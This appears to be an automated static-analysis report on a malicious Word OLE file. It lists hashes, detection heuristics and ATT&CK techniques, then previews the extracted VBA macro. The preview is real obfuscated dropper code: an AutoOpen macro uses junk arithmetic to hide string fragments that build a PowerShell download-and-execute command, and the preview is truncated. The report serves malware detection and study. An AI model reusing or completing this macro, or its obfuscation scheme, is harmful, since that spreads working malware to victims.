Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb3e80994255137a…

MALICIOUS

Office (OLE)

234.6 KB First seen: 2018-01-23
MD5: b297a1730d71771020547bf834cd1db4 SHA-1: 92f43c83a2aee0387d2ed16eb78dd4f5992f10c2 SHA-256: eb3e80994255137a3d27dce8d8fb7c9eb13545719239a576b77a45a505c2edd8
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The macro also constructs a URL string, 'Ftn+FtnmGts+GtsetriFtn+FtH8SAf', which is likely used to download and execute a secondary payload. The presence of a password-protected archive lure heuristic further suggests a multi-stage infection process.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://Ftn+FtnmGts+GtsetriFtn+FtH8SAf In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 78850 bytes
SHA-256: 1bf97fb096d56cb301ae0d1bafb165aa2ba1aa03976953686e2f651b981c6e70
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "CSBawElibM"
Function fIMEWzP()
On Error Resume Next
FLHbWri = zRHbJEbSqDJVD - CBool(zvzTiiGkjjZRf) * 216045258 / Sqr(jaXNXqqALdVpUQ) + SPhBNpVkSKsjOi / Atn(9898) * BsYjlPjwzNA - CDate(376) - jVwsJqmQRsPSFL / 3 + EDfJcRkccRoij / SkoNslOTRjpc
EhQzSKtoEn = tvJXicwuYrHPp - CBool(JLiDwpinSmm) * 216045258 / Sqr(folTzdZ) + NEjoHPAMOP / Atn(9898) * hPOEwbapZEFd - CDate(376) - kjzKJFuiqS / 3 + EftwioVYD / FmQjmsW
zsmjQAqtl = KGApMqszHnHoz + Mid("vZHnwApAF8wjIhqOsbuqqJm8q44BWwElUuasd = Ftn+FtnneFtn+FtnGts+Gt'+'sw-oGts+Gtsbject Ftn+FtnrandoFtn+Ft'+'nm;LAFtn+FtnwFtn+FiXqzl", 35, 87) + uNKKinP
qlcvM = JJcGbaZbt - CBool(DYiwtVbVM) * 216045258 / Sqr(iwHbEMZ) + llvTAzbSALM / Atn(9898) * KKZRlpN - CDate(376) - UwpOdYnLBBBP / 3 + zqHWjXf / bVQIItTYqp
vHkhEvX = IjApjdAQf - CBool(DiFwXwp) * 216045258 / Sqr(lhzvZQtjU) + iiVlPzqoiarJz / Atn(9898) * womdSDDiPUw - CDate(376) - QMHkvwIKlAiSSF / 3 + iUOYciZ / kiPQQmAOBoSjdj
jklzOus = RiPtcZF - CBool(fTmLLlQNpD) * 216045258 / Sqr(otwSHKWG) + FjwGvowQ / Atn(9898) * OKWcVvsiFm - CDate(376) - hpXRFGIUPH / 3 + FStPzVfQXmzq / spMYAadEjhi
HYFbMb = wmHmvhqbM + Mid("LR3IAiXShEXzWIKMjOiQa+FtncFtn+Ftnh(LFtn+FtnAwFtn'+'+FtnabFtn+FtncFtn+Ftn iFtn+Ftnn LFtn+FtnAwbFtn+FtncdrG", 22, 82) + QwJzDNURu
MajpDGD = fuAoovFTLNzUJA - CBool(TOrNWGffsYkljd) * 216045258 / Sqr(WcBajic) + kDfKEDTRrOGUD / Atn(9898) * QKnzPIQDJYqKr - CDate(376) - SiRRrVGJrv / 3 + bYGtXaIwiMr / jPTdjtGUuMwwI
VBVZNwHV = qHXSAzMaalm - CBool(WDWLHELi) * 216045258 / Sqr(UkwOKWn) + HZiozcwE / Atn(9898) * zAiLFtAKrmpFJD - CDate(376) - UcWXZDpaYR / 3 + MEVWaZHJGK / qOqwETjwDzWLTX
mEobvjPdIvK = hPaHlblfOtG - CBool(vKbkTWHHnj) * 216045258 / Sqr(pXNOmFpLqhRrXI) + YKMBzTC / Atn(9898) * zXanYDI - CDate(376) - nAPljYNzaYh / 3 + rdTEbRwzv / jfmVNqLRRIhD
QHzlvECWC = odilGSsYnjJJlw + Mid("fRYIMbVQinU8NkSt12pLwuW5TnR.Ftn+FtGts+GtsnSpliFtn+Ftnt(m9R,Ftn+Ftnm9R);LAwkFtn+FtnarapaFtn+FtnsFtn+FtGts+Gtsn FtGts+Gtsn+Ftn= LAwnsadasd.nFtn+Ftnext(1Gts+Gt'+'sFtn+Gts+GtsFtn, 34FR9RK", 26, 154) + NMIbviCYsZQl
XqDqlBtqMYL = ZfuIZJtl - CBool(woVMQwAwLVlH) * 216045258 / Sqr(bzWqaOWqsCwT) + bOwlpwc / Atn(9898) * BPwXiEzZ - CDate(376) - wlzrEvl / 3 + jfPrDmWsPWmz / fpiYZjXTsJY
ANEBYHXh = vfpBjNzAtEsvX - CBool(ucdFTlvItOso) * 216045258 / Sqr(EBFodJCdmRLFV) + cCNwRGzS / Atn(9898) * trwEwmlbJ - CDate(376) - UswnQPmVEILSA / 3 + ZSGjRaiullLwjE / rApBMBS
SznnXGv = KbZTwVSiLOOr - CBool(raLiKXHzTk) * 216045258 / Sqr(YYRHbGvoZb) + oSkQzpsGw / Atn(9898) * PuWqmuRHLiqrC - CDate(376) - YDKDESaRucltwt / 3 + RGNljJdvRp / dhNsXzPp
iCzDiU = sDMUIXSNC + Mid("6aFkjQC9nbiJjjFZX6]110),[stRINg][CHAr]39KRn2CN4", 19, 22) + RNRzcbfS
kOcmT = OwjfkuKEbrz - CBool(djFJiJaHMbT) * 216045258 / Sqr(hONIVQnvGorj) + vzzajkFjacKu / Atn(9898) * SDbLRmdzzVhC - CDate(376) - LDEXpoWXnLaj / 3 + rOCGlCNozkT / WFFozbSYzZBcCn
kvrONJbas = BrmQNljnp - CBool(UJOqdCVTVBvHL) * 216045258 / Sqr(nLwhUfzTh) + lXuTuisLjjEcvS / Atn(9898) * NnzSrWtjXdC - CDate(376) - zSKsAcREFHCZr / 3 + jXfKKQfD / szAparrX
CVNHuTiGhwv = IHhSMaEwfpfS - CBool(SQkKqtHsnjDLi) * 216045258 / Sqr(aUnGZqHtWDcCU) + lzwOvaSLiYap / Atn(9898) * rUYiGdiddsiF - CDate(376) - lZtjhoZUGok / 3 + QIZPmOjjIPYwZ / ZlJIHQJTos
wBwJFtqqlNj = XJfrBilvPu + Mid("l).reP'+'lacE(Gt3tXPnlfkMhf", 2, 15) + jiouNTkcSjQjp
CSzfp = sqssZnDAdNXGk - CBool(binWBMSlHv) * 216045258 / Sqr(RuzmrMOk) + hAQrwrHK / Atn(9898) * SfAHXZHmVqKX - CDate(376) - jwjHsDN / 3 + AIVXsaSwXJFH / pQKKXafErYZoaR
YFVLiJR = VusuIrODdH - CBool(scIWHiuwwPr) * 216045258 / Sqr(nXJqklLAO) + CboWNnhQiWA / Atn(9898) * coLrsWDYDIdhEW - CDate(376) - BiRSHQOajhlQHR / 3 + hVMrvUistowq / tzHRrnflREt
ALfGjCNTos = VdiiJkviSJzljJ - CBool(KAXufZr) * 216045258 / Sqr(qNtsUYUXmou) + aNQImjBMppE / Atn(9898) * XDFGWmqXd - CDate(376) - sVPsaJw / 3 + MzmiawjOIvYf / AIbURTNAAzXB
YkjMQ = KrzDwzRWf + Mid("N8tnbFtn
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.